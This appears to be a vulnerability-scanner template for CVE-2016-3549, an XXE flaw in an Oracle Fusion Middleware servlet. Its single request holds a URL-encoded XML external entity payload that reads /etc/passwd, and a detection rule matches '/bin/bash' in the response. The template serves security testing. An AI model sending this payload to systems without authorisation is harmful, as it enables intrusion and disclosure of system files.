id: oracle-afm-xxe
info:
  name: XXE in AppSearchMeta Servlet in OAFM (Oracle Application Fusion Middleware) (CVE­-2016-­3549)
  risk: High
  confidence: Tentative

params:
  - root: "{{.BaseURL}}"

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}//webservices/AppSearchMeta/foo?RequestMessage=%3C?xml%20version=%221.0%22%20encoding=%22UTF­8%22?%3E%3C!DOCTYPE%20foo%20[%3C!ELEMENT%20foo%20ANY%20%3E%3C!ENTITY%20xxe%20SYSTEM%20%22file:///etc/passwd%22%20%3E]%3E%3CmessageType%3E%26xxe;%3C/messageType%3E
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("resHeaders", "root") && StringSearch("body", "/bin/bash")

references:
  - links:
      - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
      - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
      - http://www.davidlitchfield.com/July2016CPU.pdf